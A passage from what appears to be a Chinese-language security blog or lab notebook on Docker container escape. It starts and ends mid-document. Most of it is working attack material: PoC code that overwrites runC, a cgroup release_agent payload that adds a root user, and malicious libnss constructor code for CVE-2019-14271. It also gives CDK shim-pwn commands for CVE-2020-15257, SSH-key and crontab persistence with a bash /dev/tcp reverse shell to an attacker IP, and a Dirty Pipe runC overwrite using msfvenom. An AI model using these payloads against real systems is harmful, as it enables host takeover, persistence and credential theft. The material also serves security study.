<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs autoit"><span class="hljs-meta"># 1. 编写 PoC 覆盖宿主机 runC（需内核版本符合条件）</span><br>cat &gt; exploit.c &lt;&lt;EOF<br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><span class="hljs-built_in">int</span> main(<span class="hljs-built_in">int</span> argc, char **argv) &#123;<br>  <span class="hljs-built_in">int</span> fd = open(argv[<span class="hljs-number">1</span>], O_RDWR)<span class="hljs-comment">;</span><br>  lseek(fd, <span class="hljs-number">0</span>, SEEK_SET)<span class="hljs-comment">;</span><br>  write(fd, <span class="hljs-string">&quot;MALICIOUS_BYTES&quot;</span>, <span class="hljs-number">14</span>)<span class="hljs-comment">;  # 替换为恶意代码</span><br>  close(fd)<span class="hljs-comment">;</span><br>&#125;<br>EOF<br><br><span class="hljs-meta"># 2. 编译并攻击</span><br>gcc exploit.c -o exploit<br>./exploit /host_proc/usr/bin/runc  <span class="hljs-meta"># 路径需根据信息收集调整</span><br></code></pre></td></tr></table></figure>

<p><strong>3.3 符号链接穿透</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 通过宿主机 PID 1 的 root 链接访问文件</span><br><span class="hljs-built_in">cat</span> /host_proc/1/root/etc/shadow  <span class="hljs-comment"># 直接读取宿主机 Shadow 文件</span><br></code></pre></td></tr></table></figure>

<hr>
<h4 id="4-Cgroup-危险挂载"><a href="#4-Cgroup-危险挂载" class="headerlink" title="4.Cgroup 危险挂载"></a><strong>4.Cgroup 危险挂载</strong></h4><p><strong>1. Cgroup 挂载原理</strong></p>
<ul>
<li><strong>功能</strong>：Cgroup 是 Linux 资源控制机制，用于限制进程的 CPU、内存等资源。</li>
<li>风险点：<ul>
<li><strong>release_agent 逃逸</strong>：若容器挂载可写的宿主机 Cgroup（如 <code>-v /sys/fs/cgroup:/host_cgroup</code>），可配置 <code>release_agent</code> 在宿主机执行任意命令。</li>
<li><strong>资源耗尽攻击</strong>：滥用 Cgroup 子系统（如 <code>memory</code>）触发内核 OOM Killer，干扰宿主机服务。</li>
<li><strong>子系统漏洞</strong>：特定子系统（如 <code>devices</code>）配置错误可能导致权限提升。</li>
</ul>
</li>
</ul>
<hr>
<p><strong>2. Cgroup 探测方法</strong></p>
<p><strong>2.1 基础检测</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 检查是否挂载宿主机 Cgroup</span><br>mount | grep <span class="hljs-string">&#x27;/sys/fs/cgroup&#x27;</span> | grep -v <span class="hljs-string">&#x27;tmpfs&#x27;</span>   <br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/05/13/VrzURs5WyNQuZB7.png" srcset="/img/loading.gif" lazyload alt="image-20250513151757240"></p>
<p>这也是dockers自身的默认挂载，只有出现<code>/sys/fs/cgroup on /xxx_cgroup</code>这种才是有漏洞的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#如果挂载了/sys/fs/cgroup，验证读写权限（示例输出：rw 表示可写）</span><br><br>grep <span class="hljs-string">&#x27;/host_cgroup&#x27;</span> /proc/self/mountinfo | grep -o <span class="hljs-string">&#x27;rw&#x27;</span> | xargs -I &#123;&#125; <span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;[!] Cgroup 权限: &#123;&#125;&quot;</span><br></code></pre></td></tr></table></figure>

<p><strong>2.2 release_agent 漏洞验证</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 尝试写入 release_agent（路径需宿主机可访问）</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;/tmp/payload&quot;</span> &gt; /host_cgroup/release_agent 2&gt;/dev/null<br><span class="hljs-keyword">if</span> [ $? -eq 0 ]; <span class="hljs-keyword">then</span><br>  <span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;[!] release_agent 可配置，存在逃逸风险！&quot;</span><br><span class="hljs-keyword">fi</span><br><br><span class="hljs-comment"># 检查是否允许创建新 Cgroup</span><br><span class="hljs-built_in">mkdir</span> -p /host_cgroup/test &amp;&amp; mount -t cgroup -o memory cgroup /host_cgroup/test 2&gt;/dev/null<br><span class="hljs-keyword">if</span> [ $? -eq 0 ]; <span class="hljs-keyword">then</span><br>  <span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;[!] 可创建新 Cgroup（高危）！&quot;</span><br>  umount /host_cgroup/test &amp;&amp; <span class="hljs-built_in">rmdir</span> /host_cgroup/test<br><span class="hljs-keyword">fi</span><br></code></pre></td></tr></table></figure>

<hr>
<p><strong>3. Cgroup 利用方法</strong></p>
<p><strong>3.1 release_agent 逃逸</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 1. 创建恶意 Cgroup</span><br>cg_dir=<span class="hljs-string">&quot;/host_cgroup/exploit&quot;</span><br><span class="hljs-built_in">mkdir</span> -p <span class="hljs-variable">$cg_dir</span><br><span class="hljs-built_in">echo</span> 1 &gt; <span class="hljs-variable">$cg_dir</span>/notify_on_release  <span class="hljs-comment"># 启用释放通知</span><br><br><span class="hljs-comment"># 2. 设置宿主机执行路径（需路径转换，如 Docker 路径）</span><br>host_path=$(<span class="hljs-built_in">cat</span> /proc/self/mountinfo | grep <span class="hljs-string">&#x27;docker/overlay2&#x27;</span> | awk <span class="hljs-string">&#x27;&#123;print $4&#125;&#x27;</span> | <span class="hljs-built_in">cut</span> -d <span class="hljs-string">&#x27;/&#x27;</span> -f 1-4)<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;<span class="hljs-variable">$host_path</span>/tmp/payload.sh&quot;</span> &gt; /host_cgroup/release_agent<br><br><span class="hljs-comment"># 3. 编写 Payload</span><br><span class="hljs-built_in">cat</span> &gt; /tmp/payload.sh &lt;&lt;<span class="hljs-string">EOF</span><br><span class="hljs-string">#!/bin/sh</span><br><span class="hljs-string">echo &quot;eviluser:x:0:0::/:/bin/sh&quot; &gt;&gt; /etc/passwd  # 添加 root 用户</span><br><span class="hljs-string">EOF</span><br><span class="hljs-built_in">chmod</span> +x /tmp/payload.sh<br><br><span class="hljs-comment"># 4. 触发执行</span><br>sh -c <span class="hljs-string">&quot;echo \$\$ &gt; <span class="hljs-variable">$cg_dir</span>/cgroup.procs&quot;</span>  <span class="hljs-comment"># 进程退出时触发</span><br></code></pre></td></tr></table></figure>

<p><strong>3.2 资源耗尽攻击</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 创建内存限制 Cgroup 并触发 OOM</span><br><span class="hljs-built_in">mkdir</span> -p /host_cgroup/memory/oom_test<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;1000000&quot;</span> &gt; /host_cgroup/memory/oom_test/memory.limit_in_bytes<br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;0&quot;</span> &gt; /host_cgroup/memory/oom_test/memory.swappiness<br><span class="hljs-built_in">echo</span> $$ &gt; /host_cgroup/memory/oom_test/cgroup.procs<br><span class="hljs-built_in">tail</span> /dev/zero | <span class="hljs-built_in">head</span> -c 1000000000  <span class="hljs-comment"># 触发 OOM Killer</span><br></code></pre></td></tr></table></figure>

<hr>
<h3 id="二、软件组件漏洞利用"><a href="#二、软件组件漏洞利用" class="headerlink" title="二、软件组件漏洞利用"></a>二、软件组件漏洞利用</h3><h4 id="1-runC-漏洞（CVE‑2019‑5736）"><a href="#1-runC-漏洞（CVE‑2019‑5736）" class="headerlink" title="1. runC 漏洞（CVE‑2019‑5736）"></a>1. runC 漏洞（CVE‑2019‑5736）</h4><p>可通过容器内恶意进程利用 <code>/proc/[runc-PID]/exe</code> 路径访问宿主机上的 <code>runc</code> 二进制文件，以可写方式覆盖其内容，当宿主机管理员执行 <code>docker exec</code> 等操作时，触发被篡改的 <code>runc</code> 执行任意代码（如反弹 Shell 或修改系统文件），最终以宿主机 <code>root</code> 权限突破容器隔离实现逃逸</p>
<p><strong>前置</strong>：宿主 Docker ≤18.09.2，runC 未修补</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 在容器内下载并编译 PoC</span><br>git <span class="hljs-built_in">clone</span> https://github.com/Frichetten/CVE-2019-5736-PoC.git<br><span class="hljs-built_in">cd</span> CVE-2019-5736-PoC<br>go build main.go<br>./main<br><br>要修改Poc中反弹shell的命令<br></code></pre></td></tr></table></figure>

<blockquote>
<p>成功后 PoC 会在宿主机 <code>/tmp</code> 下生成反弹 Shell。 </p>
</blockquote>
<p>很遗憾这个docker的版本太高了</p>
<p><img src="https://s2.loli.net/2025/05/13/JCOdk8lvMZ9F1GD.png" srcset="/img/loading.gif" lazyload alt="image-20250513153041460"></p>
<p>不过也试试，可以看到好像是成功了，但是还是监听状态，等一阵之后再去看，貌似确实没上东西，希望不大</p>
<p><img src="https://s2.loli.net/2025/05/13/4HeUjNnV1OTmPX8.png" srcset="/img/loading.gif" lazyload alt="image-20250513153940564"></p>
<p>无从下手啊，看下一个</p>
<h4 id="2-docker-cp-符号链接漏洞（CVE‑2019‑14271）"><a href="#2-docker-cp-符号链接漏洞（CVE‑2019‑14271）" class="headerlink" title="2. docker cp 符号链接漏洞（CVE‑2019‑14271）"></a>2. docker cp 符号链接漏洞（CVE‑2019‑14271）</h4><p><strong>1. 漏洞核心机制</strong></p>
<p>Docker 的 <code>docker cp</code> 命令在复制文件时，会调用辅助进程 <code>docker-tar</code>，该进程以宿主机 <strong>root 权限</strong>运行且 <strong>未完全容器化</strong>（未隔离 <code>seccomp</code>&#x2F;<code>cgroups</code>）。当 <code>docker-tar</code> 通过 <code>chroot</code> 进入容器文件系统时，会加载容器内的动态库（如 <code>libnss_files.so</code>），而可替换这些库注入恶意代码。所以说总的来说也是一个监听，需要宿主机进行交互才能实现</p>
<p><strong>2. 漏洞利用步骤</strong></p>
<p><strong>（1）前置条件</strong></p>
<ul>
<li>Docker 版本：19.03.1以上以及18.09以下都不受影响</li>
<li>容器权限：普通权限容器即可，无需特权模式</li>
</ul>
<p>大概思路：</p>
<p>1、找到<code>libnss_files.so.2</code>的源码，一般选取<code>nss</code>路径下的<code>files-init.c</code>源文件。</p>
<p>2、在源码中加入链接时启动代码（<code>run_at_link</code>），并定义要执行的恶意函数。</p>
<p><strong>（2）注入恶意动态库</strong></p>
<ol>
<li><strong>编译恶意 so 库</strong>：找到<code>libnss_files.so.2</code>的源码（<a target="_blank" rel="noopener" href="https://ftp.gnu.org/gnu/glibc/glibc-2.31.tar.bz2%E4%B8%8B%E8%BD%BDglibc%E5%BA%93%EF%BC%8C%E8%BF%99%E9%87%8C%E4%BB%A5%60nss%60%E8%B7%AF%E5%BE%84%E4%B8%8B%E7%9A%84%60files-init.c%60%E6%BA%90%E6%96%87%E4%BB%B6%E4%B8%BA%E4%BE%8B%EF%BC%89%EF%BC%8C%E6%B7%BB%E5%8A%A0%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E3%80%82%E4%BB%A5%E4%B8%8B%E6%98%AF%E4%B8%80%E6%AE%B5%E7%A4%BA%E4%BE%8B%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%EF%BC%88%E5%AE%9E%E9%99%85%E6%93%8D%E4%BD%9C%E4%B8%AD%E5%8F%AF%E6%A0%B9%E6%8D%AE%E6%B5%8B%E8%AF%95%E9%9C%80%E6%B1%82%E4%BF%AE%E6%94%B9%EF%BC%89%EF%BC%9A">https://ftp.gnu.org/gnu/glibc/glibc-2.31.tar.bz2下载glibc库，这里以`nss`路径下的`files-init.c`源文件为例），添加恶意代码。以下是一段示例恶意代码（实际操作中可根据测试需求修改）：</a></li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">define</span> ORIGINAL_LIBNSS <span class="hljs-string">&quot;/original_libnss_files.so.2&quot;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> LIBNSS_PATH <span class="hljs-string">&quot;/lib/x86_64-linux-gnu/libnss_files.so.2&quot;</span></span><br><span class="hljs-type">bool</span> <span class="hljs-title function_">is_priviliged</span><span class="hljs-params">()</span>;<br>__attribute__ ((constructor)) <span class="hljs-type">void</span> <span class="hljs-title function_">run_at_link</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span><br>&#123;<br>    <span class="hljs-type">char</span> * argv_break[<span class="hljs-number">2</span>];<br>    <span class="hljs-keyword">if</span> (!is_priviliged())<br>        <span class="hljs-keyword">return</span>;<br>    rename(ORIGINAL_LIBNSS, LIBNSS_PATH);<br>    <span class="hljs-keyword">if</span> (!fork())<br>    &#123;<br>        <span class="hljs-comment">// Child runs breakout</span><br>        argv_break[<span class="hljs-number">0</span>] = strdup(<span class="hljs-string">&quot;/breakout&quot;</span>);<br>        argv_break[<span class="hljs-number">1</span>] = <span class="hljs-literal">NULL</span>;<br>        execve(<span class="hljs-string">&quot;/breakout&quot;</span>, argv_break, <span class="hljs-literal">NULL</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span><br>        wait(<span class="hljs-literal">NULL</span>); <span class="hljs-comment">// Wait for child</span><br>    <span class="hljs-keyword">return</span>;<br>&#125;<br><span class="hljs-type">bool</span> <span class="hljs-title function_">is_priviliged</span><span class="hljs-params">()</span><br>&#123;<br>    FILE * proc_file = fopen(<span class="hljs-string">&quot;/proc/self/exe&quot;</span>, <span class="hljs-string">&quot;r&quot;</span>);<br>    <span class="hljs-keyword">if</span> (proc_file != <span class="hljs-literal">NULL</span>)<br>    &#123;<br>        fclose(proc_file);<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>; <span class="hljs-comment">// can open so /proc exists, not privileged</span><br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>; <span class="hljs-comment">// we&#x27;re running in the context of docker-tar</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>使用 GCC 等编译器将修改后的源码编译成恶意的<code>libnss_files.so.2</code>库。假设源码文件名为<code>malicious_libnss.c</code>，在终端执行编译命令<code>gcc -shared -fPIC -o libnss_files.so.2 malicious_libnss.c</code>。</p>
<p><strong>准备恶意执行脚本（breakout 程序）</strong>：编写一个简单的脚本作为恶意执行的程序，例如创建一个文件来证明漏洞利用成功。在测试主机上创建<code>breakout</code>文件，内容如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/bash</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;Exploit successful!&quot;</span> &gt; /tmp/exploit_success.txt<br></code></pre></td></tr></table></figure>

<p>赋予<code>breakout</code>文件可执行权限，执行<code>chmod +x breakout</code>。</p>
<p><strong>将恶意文件放入容器</strong>：将编译好的恶意<code>libnss_files.so.2</code>和<code>breakout</code>文件复制到运行中的容器内。执行<code>docker cp libnss_files.so.2 vulnerable:/lib/x86_64-linux-gnu/</code>和<code>docker cp breakout vulnerable:/</code> ，<code>vulnerable</code>为容器名称。</p>
<p>当主机上执行<code>docker cp</code>命令，从容器内复制文件到宿主机，触发漏洞。例如执行<code>docker cp vulnerable:/etc/passwd /tmp/</code> ，此时会触发恶意<code>libnss_files.so.2</code>中的代码。执行完<code>docker cp</code>命令后，检查测试主机上的<code>/tmp/exploit_success.txt</code>文件是否存在。若存在，则说明漏洞复现成功，证明宿主机执行了容器内恶意代码。</p>
<p>漏洞复现全过程：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41667409/article/details/121557358">https://blog.csdn.net/qq_41667409/article/details/121557358</a></p>
<p>很明显我这个docker版本肯定不存在该逃逸漏洞，主要证明就是，docker下的lib&#x2F;x86_64-linux-gnu&#x2F;都没有libnss_files.so.2文件</p>
<h4 id="3-containerd‑shim-漏洞（CVE‑2020‑15257）"><a href="#3-containerd‑shim-漏洞（CVE‑2020‑15257）" class="headerlink" title="3. containerd‑shim 漏洞（CVE‑2020‑15257）"></a>3. containerd‑shim 漏洞（CVE‑2020‑15257）</h4><p>可在以 <code>--net=host</code> 模式启动的容器（需 root 权限）中，通过访问宿主机共享网络命名空间内的 <code>containerd-shim</code> 抽象 Unix 域套接字，调用其暴露的 API（如创建新容器或执行命令）并挂载宿主机根目录到容器路径，从而以宿主机 <code>root</code> 权限突破容器隔离并控制宿主机。</p>
<p><strong>前置</strong>：</p>
<p>Docker 版本：containerd &lt;1.3.9 或 &lt;1.4.3（Docker 版本通常对应 19.03.6 及以下）</p>
<p>容器启动方式：需以 <code>--net=host</code> 模式运行，共享宿主机的网络命名空间，暴露 <code>containerd-shim</code> 的抽象 Unix 域套接字</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker run --net=host -it --pid=host alpine sh<br></code></pre></td></tr></table></figure>

<p><strong>2. 漏洞检测</strong></p>
<ol>
<li><p>确认容器网络模式</p>
<p>在容器内执行：</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">cat <span class="hljs-regexp">/proc/</span>net/unix | <span class="hljs-keyword">grep</span> <span class="hljs-string">&#x27;containerd-shim&#x27;</span> | <span class="hljs-keyword">grep</span> <span class="hljs-string">&#x27;@&#x27;</span><br></code></pre></td></tr></table></figure>

<p>若输出类似</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">@<span class="hljs-string">/containerd-shim/</span>&#123;sha256&#125;<span class="hljs-string">.sock</span><br></code></pre></td></tr></table></figure>

<p> 的路径，则存在暴露的套接字</p>
</li>
</ol>
<hr>
<p><strong>3. 利用工具（自动化工具 CDK）</strong></p>
<ol>
<li><p><strong>上传 CDK 到容器</strong></p>
<ul>
<li><p>若容器支持文件上传，直接下载并赋予执行权限：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">wget https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/cdk-team/</span>CDK<span class="hljs-regexp">/releases/</span>download<span class="hljs-regexp">/v1.5.0/</span>cdk_linux_amd64 -O cdk<br>chmod +x cdk<br></code></pre></td></tr></table></figure>
</li>
<li><p>若容器无网络，可通过 nc 传输文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 宿主机监听端口（假设端口为 9999）</span><br>nc -lvp 9999 &lt; cdk<br><span class="hljs-comment"># 容器内接收文件</span><br><span class="hljs-built_in">cat</span> &lt; /dev/tcp/宿主机IP/9999 &gt; cdk<br><span class="hljs-built_in">chmod</span> +x cdk<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p><strong>执行逃逸命令</strong></p>
<ul>
<li><p>反弹 Shell 到攻击机（需攻击机监听端口）：</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs applescript">./cdk <span class="hljs-built_in">run</span> shim-pwn <span class="hljs-built_in">reverse</span> 攻击机IP 监听端口<br></code></pre></td></tr></table></figure>
</li>
<li><p>直接执行宿主机命令</p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs applescript">./cdk <span class="hljs-built_in">run</span> shim-pwn <span class="hljs-string">&quot;echo &#x27;root::0:0::/:/bin/bash&#x27; &gt;&gt; /host_fs/etc/passwd&quot;</span>  <span class="hljs-comment"># 示例：修改宿主机密码文件</span><br></code></pre></td></tr></table></figure></li>
</ul>
</li>
</ol>
<hr>
<p><strong>4. 手动利用（调用 containerd-shim API）</strong></p>
<ol>
<li><p><strong>定位套接字路径</strong><br>通过 <code>/proc/net/unix</code> 获取 <code>containerd-shim</code> 套接字路径（如 <code>@/containerd-shim/abc123.sock</code>）</p>
</li>
<li><p><strong>调用 API 创建恶意容器</strong><br>使用工具（如 <code>grpcurl</code>）与套接字交互，创建挂载宿主机根目录的容器：</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-comment"># 示例：通过创建新容器挂载宿主机根目录到容器内</span><br>grpcurl -unix <span class="hljs-string">/containerd-shim/abc123.sock</span> containerd.runtime.v1.Shim/CreateTask \<br>  &lt;&lt;&lt; &#x27;&#123;<span class="hljs-string">&quot;id&quot;</span>:<span class="hljs-string">&quot;evil&quot;</span>, <span class="hljs-string">&quot;bundle&quot;</span>:<span class="hljs-string">&quot;/tmp&quot;</span>, <span class="hljs-string">&quot;rootfs&quot;</span>: [<span class="hljs-string">&quot;type=bind,source=/,destination=/host_fs,options=rbind&quot;</span>]&#125;&#x27;<br></code></pre></td></tr></table></figure>

<p>成功挂载后，通过容器内的 <code>/host_fs</code> 目录可直接读写宿主机文件系统</p>
</li>
<li><p><strong>提权与持久化</strong></p>
<p>写入 SSH 公钥</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">echo <span class="hljs-string">&#x27;ssh-rsa AAAAB3NzaC1y...&#x27;</span> &gt;&gt; <span class="hljs-regexp">/host_fs/</span>root<span class="hljs-regexp">/.ssh/</span>authorized_keys<br></code></pre></td></tr></table></figure>

<p>修改 crontab</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;* * * * * root bash -c &#x27;bash -i &gt;&amp; /dev/tcp/攻击机IP/端口 0&gt;&amp;1&#x27;&quot;</span> &gt; /host_fs/etc/crontab<br></code></pre></td></tr></table></figure></li>
</ol>
<hr>
<h3 id="三、内核漏洞逃逸"><a href="#三、内核漏洞逃逸" class="headerlink" title="三、内核漏洞逃逸"></a>三、内核漏洞逃逸</h3><p>为什么使用内核提权，因为Dcoker和宿主机是共享一个内核的，所以内核提权可以在Docker中实现提权的，但此处的提权仅限于在Docker内部，难道就不能实现docker逃逸了吗？可以，但是<strong>需要在特殊情况下</strong>！！！以下两种情况：</p>
<table>
<thead>
<tr>
<th align="center"><strong>场景</strong></th>
<th align="center"><strong>是否逃逸到宿主机</strong></th>
<th align="center"><strong>依赖条件</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>仅容器内提权</strong></td>
<td align="center">否</td>
<td align="center">漏洞仅覆盖容器内文件（如容器内 <code>/etc/passwd</code>），未挂载宿主机目录或调用宿主机接口。</td>
</tr>
<tr>
<td align="center"><strong>宿主机逃逸</strong></td>
<td align="center">是</td>
<td align="center">需满足 <strong>任意一项</strong>： 1. 容器挂载宿主机敏感目录（如 <code>-v /:/host</code>，挂载根目录）。 2. 容器拥有高危权限（如 <code>CAP_DAC_READ_SEARCH</code>）。</td>
</tr>
</tbody></table>
<h3 id="前置条件查看"><a href="#前置条件查看" class="headerlink" title="前置条件查看"></a>前置条件查看</h3><p><strong>查看挂载配置</strong></p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coq">mount | <span class="hljs-type">grep</span> -E &#x27;/etc|<span class="hljs-type">/dev</span>|<span class="hljs-type">/proc</span>|<span class="hljs-type">/sys</span>|<span class="hljs-type">/var</span>/run&#x27;<br></code></pre></td></tr></table></figure>

<p>危险挂载示例：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">/dev/sda1 on /host_fs <span class="hljs-built_in">type</span> ext4 (rw)  <span class="hljs-comment"># 宿主机根目录被挂载且可写,在大多数 Linux 系统中，/dev/sda1 通常就是宿主机的根分区（/）。</span><br></code></pre></td></tr></table></figure>

<p>如果挂在了根目录，我们就可以把&#x2F;host类比宿主机的根目录一样，例如：执行<code>cat /host_fs/etc/passwd</code>，效果就等同于在宿主机上执行<code>cat /etc/passwd</code></p>
<hr>
<p><strong>2. 检查容器的 Capabilities（高危权限）</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> /proc/1/status | grep CapEff<br></code></pre></td></tr></table></figure>

<p>输出解读：</p>
<ul>
<li><code>CapEff: 0000003fffffffff</code> → 拥有几乎所有权限（特权容器）。</li>
<li><code>CapEff: 00000000a80425fb</code> → 普通权限（安全配置）。</li>
</ul>
<h4 id="1-Dirty-Pipe（CVE‑2022‑0847）"><a href="#1-Dirty-Pipe（CVE‑2022‑0847）" class="headerlink" title="1. Dirty Pipe（CVE‑2022‑0847）"></a>1. Dirty Pipe（CVE‑2022‑0847）</h4><p>Dirty Pipe 是 Linux 内核 5.8 及以上版本中存在的一个本地提权漏洞，允许非特权用户通过覆写只读文件的页面缓存（如 <code>/etc/passwd</code>）实现权限提升。其核心原理是管道缓冲区标志位 <code>PIPE_BUF_FLAG_CAN_MERGE</code> 未正确初始化，导致可可通过拼接（<code>splice</code>）和写入（<code>write</code>）操作覆盖目标文件内容</p>
<p><strong>前置</strong>：Linux 内核 ≥5.8 且未打补丁</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">uname</span> -a  <span class="hljs-comment"># 检查内核版本是否符合漏洞范围</span><br><br>git <span class="hljs-built_in">clone</span> https://github.com/JlSakuya/CVE-2022-0847-container-escape.git<br><span class="hljs-built_in">cd</span> CVE-2022-0847-container-escape<br>gcc exploit.c -o exploit<br>msfvenom -p linux/x64/exec CMD=<span class="hljs-string">&quot;bash&quot;</span> -f elf &gt; shell.elf<br>./exploit /usr/bin/runC shell.elf<br></code></pre></td></tr></table></figure>

<blockquote>
<p>PoC 会将 <code>runC</code> 替换为可执行 Shell 的 ELF，执行 <code>docker exec</code> 即获得宿主 Shell。 </p>
</blockquote>
<h4 id="配合"><a href="#配合" class="headerlink" title="配合"></a>配合</h4><p>挂载的利用就很轻松了，这里直接给出配合高危权限(CapEff: 0000003fffffffff)的利用过程</p>
<p><strong>步骤 1：确认容器权限</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 在容器内检查 Capabilities</span><br><span class="hljs-built_in">cat</span> /proc/1/status | grep CapEff<br></code></pre></td></tr></table></figure>

<ul>
